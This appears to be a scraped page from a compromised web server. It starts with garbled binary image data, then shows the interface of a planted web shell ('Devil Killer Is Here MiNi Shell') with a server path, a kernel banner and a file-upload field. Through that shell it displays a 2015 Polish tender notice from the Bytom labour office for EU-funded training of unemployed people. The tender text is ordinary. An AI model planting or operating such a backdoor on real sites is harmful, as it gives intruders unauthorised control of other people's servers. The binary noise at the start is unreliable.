JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150827/221086-N-2015.html

<p class="kh_header"><b>Bytom: Szkolenia osób bezrobotnych, w podziale na VI części  współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020.</b><br>
<b>Numer ogłoszenia: 221086 - 2015; data zamieszczenia: 27.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Łagiewnicka 15, 41-902 Bytom, woj. śląskie, tel. 032 2813307, 2817019, 2818860, faks 032 2818860.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bytom.praca.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna samorządu terytorialnego. Powiatowy Urząd Pracy..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia osób bezrobotnych, w podziale na VI części  współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są szkolenia grupowe osób bezrobotnych zarejestrowanych                                 w Powiatowym Urzędzie Pracy w Bytomiu w podziale na  VI części. 
Szkolenia winny odbywać się na terenie Bytomia lub w innej miejscowości, przy czym łączny czas dojazdu z centrum Bytomia do miejsca odbywania szkolenia i z powrotem środkami transportu zbiorowego nie może przekraczać 3 godzin. 
Koszt dojazdu do miejsca odbywania szkolenia i z powrotem pokrywa uczestnik szkolenia. 
Koszt wszystkich egzaminów jest częścią składową kosztu szkolenia i winien być podany                   w preliminarzu. Ilość godzin podana w ofercie winna obejmować egzaminy końcowe                                  i cząstkowe.                              
Zajęcia winny odbywać się codziennie, wyłącznie od poniedziałku do piątku, w godzinach przedpołudniowych lub popołudniowych. (zaczynać się nie wcześniej niż o godz. 8:00 kończyć nie później niż  o godzinie 20:00), w formie kursu, realizowanego według planu nauczania obejmującego przeciętnie nie mniej niż 25 godz. zegarowych w tygodniu.
Wykonawca winien posiadać zaktualizowany na 2015 rok wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy, stosownie do treści art. 20 ust. 1 ustawy z dnia 20.04.2004 r. o promocji zatrudnienia i instytucjach rynku pracy (jt. Dz. U. z 2015 r., poz. 149 ze zm.).
Zamawiający skieruje osoby bezrobotne, zakwalifikowane na dane szkolenie, na badania lekarskie                 i psychologiczne określone w programie szkolenia we własnym zakresie i na własny koszt.
Wykonawca winien zapewnić odpowiednią kadrę szkoleniową, tj.:
a) wykładowców (nie dotyczy instruktorów prowadzących zajęcia praktyczne) posiadających wykształcenie wyższe zgodne z kierunkiem prowadzonych zajęć oraz posiadających przygotowanie pedagogiczne;  
b) wykładowców/instruktorów posiadających co najmniej 2 letnie doświadczenie w pracy pedagogiczno-dydaktycznej.
Wszyscy uczestnicy winni otrzymać materiały szkoleniowe w postaci pendrivów min. 4GB                     oraz oryginalnych podręczników (zamawiający nie dopuszcza kserokopii podręcznika),                        a jeżeli to będzie niezbędne, skryptów lub opracowań własnych wykładowców                                 oraz materiałów piśmiennych - /zeszyt min. 96/100 kartkowy i długopis/ .
Podręczniki winny być dostarczone uczestnikom, najpóźniej na drugich zajęciach.
Wykonawca winien zapewnić  materiały niezbędne do realizacji zajęć praktycznych, w ilości umożliwiającej skorzystanie z nich wszystkim uczestnikom szkolenia, w sposób umożliwiający pełną realizację programu. 
Wszyscy uczestnicy winni otrzymać w trakcie zajęć poczęstunek w postaci mieszanych, drobnych art. spożywczych (np. paluszki, krakersy, kruche ciasteczka itp.) w ilości min. 50g dziennie na osobę, kawy i herbaty ( w ilości pozwalającej przygotować min. dwie filiżanki dziennie na osobę ), dodatku do kawy i herbaty (cukier, mleko lub zabielacz do kawy) - w ilościach nieograniczonych,                               oraz zimnego napoju (sok lub woda mineralna - min. 0,5 litra na osobę dziennie) oraz jednego ciepłego posiłku jednodaniowego dziennie. Zamawiający nie dopuszcza podawania dań typu fast food, instant itp.
Zamawiający nie wyraża zgody na łączenie grup.  Jednocześnie Zamawiający zastrzega sobie prawo skierowania na szkolenie, w tym samym okresie, kilku grup jednocześnie.                                          Każda z grup musi być cały czas pod opieką osoby prowadzącej zajęcia.  Zamawiający nie dopuszcza, aby jeden wykładowca   prowadził zajęcia w kilku salach (grupach) jednocześnie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku (dotyczy wszystkich części):

Wykonawca winien posiadać zaktualizowany na 2015 rok wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy, stosownie do treści art. 20 ust. 1 ustawy z dnia 20.04.2004 r. o promocji zatrudnienia i instytucjach rynku pracy (jt. Dz. U. z 2015 r., poz. 149 ze zm.).

Ponadto:
Dotyczy części IV: wykonawca winien posiadać pisemne potwierdzenie spełnienia wymagań Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego, na podstawie                                             § 26 ust. 3  Rozporządzenia Ministra Gospodarki z dnia 20.09.2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych  i drogowych (Dz. U nr 118 poz.1263 z 2001 r.)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Wykonawca winien zapewnić uczestnikom szkolenia warunki do nauki z uwzględnieniem zasad BHP oraz wyposażeniem stosownym do potrzeb grupy słuchaczy.

Wykonawca winien wykazać, iż w celu realizacji nin. zamówienia dysponuje lub będzie dysponował lokalem obejmującym co najmniej:
a) salę wykładową min. 2 m2 powierzchni sali wykładowej na jednego kursanta, posiadającą oświetlenie dzienne z możliwością zaciemnienia w postaci
     zasłon, rolet czy żaluzji oraz oświetlenie sztuczne,
b) odpowiednio wyposażone pomieszczenie/a do przeprowadzenia zajęć praktycznych
    zgodnie z tematyką prowadzonego szkolenia,
      c)   WC,
      d)   pomieszczenie umożliwiające przygotowanie ciepłych i zimnych napoi i spożycie posiłku, wyposażone w czajnik, naczynia, sztućce - zwane w skrócie jadalnią 
oraz wskazać podstawę dysponowania powyższym zasobem.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Wykonawca jest zobowiązany wykazać, iż posiada aktualne, opłacone ubezpieczenie                 od odpowiedzialności cywilnej z tytułu prowadzonej działalności związanej                                z przedmiotem zamówienia, co najmniej na kwotę 20 000,00 zł na jedno lub wszystkie zdarzenia.

W przypadku rozłożenia składki ubezpieczeniowej na raty, Zamawiający uzna spełnienie warunku w przypadku, gdy na dzień składania ofert opłacona została część wymagalnej składki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	OFERTA, która winna być zgodna z formularzem stanowiącym załącznik            Nr 1 do  specyfikacji, przy czym na każde szkolenie wchodzące                     w skład danej części przetargu Wykonawca winien złożyć osobny preliminarz kosztów szkolenia,
2)	dokumentów potwierdzających, że oferowane usługi odpowiadają wymaganiom Zamawiającego, tj. programu szkolenia (Załącznik Nr 5).
3)	pełnomocnictwo do działania w imieniu Wykonawcy, jeżeli do reprezentowania Wykonawcy wskazano inną osobę niż upoważnioną z mocy prawa - oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza,
4)	dokumentu potwierdzającego ustanowienie pełnomocnika zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych w przypadku, gdy do przetargu przystępują Wykonawcy działający wspólnie - oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza.
5)	dowodu/dowodów wskazującego/-ych, że zasoby podmiotu trzeciego, na które powołuje się Wykonawca zostaną mu udostępnione, np. pisemnego zobowiązania podmiotu, zawierającego informacje określone w § 1 ust. 6 rozporządzenia Prezesa Rady Ministrów z dnia 19.02.2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r., poz. 231). W sytuacji, gdy przedmiotem zobowiązania są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia (np. doświadczenie) konieczne jest wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia. Należy złożyć oryginał dokumentu/dokumentów dot. zobowiązania podmiotu trzeciego (można skorzystać z załącznika nr 8 do SIWZ).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - posiadanie co najmniej jednego certyfikatu jakości usług - 20</li>
<li>3 - miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty,  za wyjątkiem możliwości i warunków dokonania takiej zmiany określonych poniżej:
a)	zmiana strony umowy, tj. następstwo prawne wynikające z odrębnych przepisów,
b)	zmiana terminu wykonania zamówienia będąca następstwem okoliczności, których nie można było wcześniej przewidzieć i nie można jej przypisać Wykonawcy, w tym w przypadku przedłużającej się procedury przetargowej, jeżeli do wykonania zamówienia pozostało mniej niż 2 miesiące od dnia zawarcia umowy, o ten okres, jednak nie dłużej  niż do dnia 30.11.2015 r.,
c)	zmiany osób, które będą uczestniczyć w wykonywaniu zamówienia, z zastrzeżeniem, iż
       osoba wskazana przez Wykonawcę posiada co najmniej takie kwalifikacje jakich
       wymagano w specyfikacji,
d)	zmiany ilości uczestników szkolenia, będącej następstwem okoliczności, których nie można było przewidzieć,
e)	zmiany miejsca odbywania szkolenia, będącej następstwem okoliczności, których nie można było przewidzieć, z zastrzeżeniem, iż nowe miejsce odbywania szkolenia spełnia warunki  i kryteria oceny ofert określone w specyfikacji istotnych warunków zamówienia, w szczególności gdy Wykonawcy przyznano punkty w kryterium - miejsce odbywania zajęć,
f)	zmiany wskazanych podwykonawców, rezygnacja z podwykonawców, zmiany wskazanego zakresu podwykonawstwa, wykonanie zamówienia przy pomocy podwykonawców, pomimo niewskazania w postępowaniu o udzielenie zamówienia publicznego żadnej części zamówienia przeznaczonej do wykonania w ramach podwykonawstwa.
W przypadku zmiany lub rezygnacji z podwykonawcy, na którego potencjał Wykonawca powoływał się w zakresie spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego, Wykonawca zobowiązany jest wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia te warunki  w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. 
Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu, Wykonawca zobowiązany jest złożyć wraz z wnioskiem, o którym mowa w ust.2,
    g) zmiany lub rezygnacji z udziału podmiotów trzecich nie będących   podwykonawcami, zapisy dot. zmiany podwykonawców stosuje się odpowiednio.
2.	Dokonanie zmiany umowy w zakresie jw. wymaga uprzedniego złożenia na piśmie wniosku Wykonawcy wykazującego zasadność wprowadzenia zmian i zgody Zamawiającego na jej dokonanie lub przedłożenie propozycji zmian przez Zamawiającego.
3.	Wszystkie zmiany i uzupełnienia niniejszej umowy wymagają pod rygorem nieważności formy pisemnej w postaci aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bytom.praca.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Bytomiu
ul. Łagiewnicka 15
41 - 902 BYTOM 
pok. 62.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2015 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Bytomiu
ul. Łagiewnicka 15
41 - 902 BYTOM 
Biuro Podawcze (pok. 20).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I,  na którą składają się 2 szkolenia:


1.	Administracyjna obsługa małej firmy;
2.	Specjalista ds. kadr i plac..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 200. Szkolenie musi zawierać następujące bloki tematyczne:
Organizacja pracy w biurze;
Zarządzanie pracą i czasem swoim i szefa: ustalanie priorytetów, planowanie zadań - sporządzanie dziennych i tygodniowych planów zadań, delegowanie zadań, wykorzystanie terminarza;
	Czynności kancelaryjne: organizacja obiegu pism, metody przechowywania dokumentów, fazy obiegu pism, organizacja i przygotowywanie materiałów na zebrania i narady, obsługa narad - protokoły;
Korespondencja:  analiza korespondencji, klasyfikacja dokumentów - korespondencja poufna, zasady sporządzania pism, pisma zatytułowane, zaadresowane i mieszane;
	Elektroniczny obieg dokumentów, podpis elektroniczny, e-PUAP, elektroniczna skrzynka podawcza;
podstawy księgowości, prowadzenie księgi przychodów  i rozchodów;
klasyfikacja podstawowych podmiotów gospodarczych i usytuowanie w nich działu kadr i płac;
wybrane zagadnienia z prawa pracy, prawa cywilnego i administracyjnego;
kadry;
ubezpieczenia społeczne;
płace;
obsługa komputera;
program PŁATNIK;
pierwsza pomoc przedlekarska.

Zamówienie obejmuje przeszkolenie 20 osób, w 2 grupach po 10 osób  i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy do                                     30 listopada 2015 r. Uczestnicy szkolenia nie mogą mieć więcej niż 8 godzin zajęć dziennie.
Wykonawca zapewni uczestnikom odpowiednią ilość komputerów tzn. tak, aby każdy uczestnik pracował na oddzielnym komputerze ze stosownym oprzyrządowaniem, licencjonowanymi programami komputerowymi niezbędnymi do realizacji zamówienia, 
w tym min. WINDOWS XP lub nowszym i min. MS Office 2000 lub nowszym. Uczestnicy otrzymają podręczniki zgodne z aktualną wersją  oprogramowania używanego podczas szkolenia.

Po zrealizowaniu materiału  odbędzie się egzamin wewnętrzny z części teoretycznej                       i praktycznej szkolenia.  Wykonawca sporządzi i przekaże Zamawiającemu protokół                     z przeprowadzonego egzaminu

2.	Specjalista ds. kadr i plac.

Liczba godzin na szkoleniu musi wynosić min. 160. Szkolenie musi zawierać następujące bloki tematyczne:
Podstawy prawne funkcjonowania firmy;
Prawo pracy, kodeks pracy i zagadnienia kadrowe;
Rekrutacja pracowników;
Teczki osobowe;
Rodzaje umów o pracę;
Zawarcie i rozwiązanie stosunku pracy;
Zdarzenia kadrowe - urlopy, choroby, wypadki, zasiłki itp.;
Raporty kadrowe;
Systemy wynagradzania pracowników;
Budowanie listy płac; 
Rozliczenie z ZUS-em i Urzędem Skarbowym;
Raporty płacowe;
Obsługa komputera i komputerowych programów biurowych;
Obsługa programu Symfonia;
Obsługa programu PŁATNIK.


